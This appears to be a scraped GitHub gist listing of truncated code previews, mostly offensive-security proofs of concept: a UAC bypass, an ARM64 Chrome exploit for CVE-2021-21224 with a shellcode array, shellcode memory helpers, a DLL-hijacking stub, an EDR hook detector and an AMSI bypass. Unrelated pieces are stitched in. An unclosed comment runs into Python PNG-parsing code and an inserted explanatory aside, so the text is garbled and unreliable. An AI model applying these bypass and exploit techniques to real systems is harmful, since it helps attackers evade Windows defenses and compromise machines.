/*
TaskManagerSecret
Author: @splinter_code
This is a very ugly POC for a very unreliable UAC bypass through some UI hacks.
The core of this hack is stealing and using a token containing the UIAccess flag set.
A trick described by James Forshaw, so all credits to him --> https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html
From there it uses a task manager "feature" to run a new High IL cmd.exe.
This has been developed only for fun and shouldn't be used due to its high unreliability.
import zlib
import io
import sys
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
def parse_png_chunk(stream):
    # Chunk layout: 4-byte big-endian length, 4-byte type, body, 4-byte CRC-32 over type + body.
    size = int.from_bytes(stream.read(4), "big")
    ctype = stream.read(4)
    body = stream.read(size)
    # The two lines below complete the function past the preview cut-off.
    csum = int.from_bytes(stream.read(4), "big")
    assert zlib.crc32(ctype + body) == csum
    return ctype, body
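As an added example (not part of the gist above, which the listing cuts off after the first three reads of `parse_png_chunk`): a complete chunk walker using the same field layout, which verifies every CRC, refuses truncated input instead of looping, and reports any bytes left after the IEND chunk, which a conforming decoder never reads. The `make_chunk`/`make_png` builders and their `trailing` argument are constructed here to produce offline test input and are not from the original.

```python
import io
import struct
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def parse_png_chunk(stream):
    """Read one chunk: length (4, BE), type (4), body, CRC-32 (4, BE) over type + body."""
    header = stream.read(8)
    if len(header) < 8:
        # int.from_bytes(b"", "big") is 0, so without this check a truncated
        # file would yield endless empty chunks and never reach IEND.
        raise ValueError("truncated PNG: chunk header cut short")
    size = int.from_bytes(header[:4], "big")
    ctype = header[4:]
    body = stream.read(size)
    csum_raw = stream.read(4)
    if len(body) < size or len(csum_raw) < 4:
        raise ValueError(f"truncated PNG: chunk {ctype!r} cut short")
    if zlib.crc32(ctype + body) != int.from_bytes(csum_raw, "big"):
        raise ValueError(f"bad CRC on chunk {ctype!r}")
    return ctype, body


def walk_png(data):
    """Return ([(type, body), ...], trailing_bytes) for a PNG byte string.

    trailing_bytes is whatever follows the IEND chunk's CRC. Decoders stop at
    IEND, so data there is invisible to viewers but still present in the file.
    """
    stream = io.BytesIO(data)
    if stream.read(8) != PNG_MAGIC:
        raise ValueError("not a PNG: bad signature")
    chunks = []
    while True:
        ctype, body = parse_png_chunk(stream)
        chunks.append((ctype, body))
        if ctype == b"IEND":
            break
    return chunks, stream.read()


def validate_png(data):
    """Non-raising wrapper: (True, trailing_byte_count) or (False, reason)."""
    try:
        _, trailing = walk_png(data)
    except ValueError as exc:
        return False, str(exc)
    return True, len(trailing)


def chunk_types(data):
    return [ctype for ctype, _ in walk_png(data)[0]]


# --- constructed test input (not from the original gist) ---------------------

def make_chunk(ctype, body):
    return (struct.pack(">I", len(body)) + ctype + body
            + struct.pack(">I", zlib.crc32(ctype + body)))


def make_png(width=2, height=2, trailing=b""):
    """Build a minimal 8-bit RGBA PNG, optionally with bytes appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    # One scanline per row: filter byte 0, then `width` opaque red RGBA pixels.
    raw = b"".join(b"\x00" + b"\xff\x00\x00\xff" * width for _ in range(height))
    return (PNG_MAGIC
            + make_chunk(b"IHDR", ihdr)
            + make_chunk(b"IDAT", zlib.compress(raw))
            + make_chunk(b"IEND", b"")
            + trailing)


if __name__ == "__main__":
    print(chunk_types(make_png()), validate_png(make_png()))
    print(validate_png(make_png(trailing=b"leftover bytes after IEND")))
```

The CRC covers the type and body but not the length field, so a length that has been tampered with shows up as a CRC mismatch on the following chunk rather than on the one whose length changed; the truncation checks are what keep that from turning into an infinite loop.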
@ManDeJan
ManDeJan / decompress.asm
Last active April 4, 2023 03:38
decompress.asm
.cpu cortex-m3
.syntax unified @ this is important, you won't get most of thumb-2 otherwise
.text
@ this file contains an assembly version of a lz decoder for cpse1 at the hogeschool utrecht
@ it's done in 15 instructions / 40 bytes, 20% less than what the best compiler did :)
@ compiler benchmarks
@ clang (trunk)
@ -O0 124 bytes
@aaaddress1
aaaddress1 / memBruteforce.cpp
Last active February 20, 2024 11:16
Windows 32-bit Shellcode Design without TEB & fs:30h
// memBruteforce.cpp by aaaddress1@chroot.org
// brute search loaded modules in memory
// rewrite from https://www.exploit-db.com/exploits/45293
#include <Windows.h>
#include <iostream>
#pragma warning(disable:4996)
bool isMemExist(size_t addr) {
int retv;
__asm {
@wdormann
wdormann / CVE-2021-21224.html
Last active October 31, 2022 22:01
Sample ARM64 PoC for CVE-2021-21224
<script>
function gc() {
for (var i = 0; i < 0x80000; ++i) {
var a = new ArrayBuffer();
}
}
let shellcode = [
// Move x18 to x28 (TEB)
@mjosaarinen
mjosaarinen / cmov_vs_ct.txt
Created April 13, 2021 08:35
CMOV vs Constant-Time
Markku-Juhani O. Saarinen <mjos@pqshield.com>
Apr 11, 2021, 9:32 PM (2 days ago)
to Tech-crypto-ext@lists.riscv.org, tech-bitmanip@lists.riscv.org.
Hello Bitmanip and Krypto,
A colleague asked: "Why CMOV is not on the constant-time Zkt list -- the Bitmanip specification says that it is helpful for cryptography?" https://github.com/rvkrypto/riscv-zkt-list
@X-C3LL
X-C3LL / hookdetector.vba
Created December 7, 2020 22:31
VBA Macro to detect EDR Hooks (It's just a PoC)
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
    Dim address As LongPtr
    Dim firstByte As Byte
    address = GetProcAddress(hModule, target)
    CopyMemory VarPtr(firstByte), address, 1
    ' Lines from here complete the truncated preview: 0xE9 (jmp rel32) at the entry point is the usual inline hook.
    checkHook = IIf(firstByte = &HE9, 1, 0)
End Function
@monoxgas
monoxgas / main.cpp
Created February 12, 2020 19:27
Adaptive DLL Hijacking - Stability Hooking
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
DWORD WINAPI Thread(LPVOID lpParam) {
// Insert evil stuff
ExitProcess(0);
@TheWover
TheWover / AMSIScanBufferBypass.cs
Last active October 5, 2021 11:20
Working full program for AMSIScanBufferBypass from Cyber Ark: https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/
using System;
using System.Runtime.InteropServices;
namespace AMSIBypass2
{
class Program
{
[DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);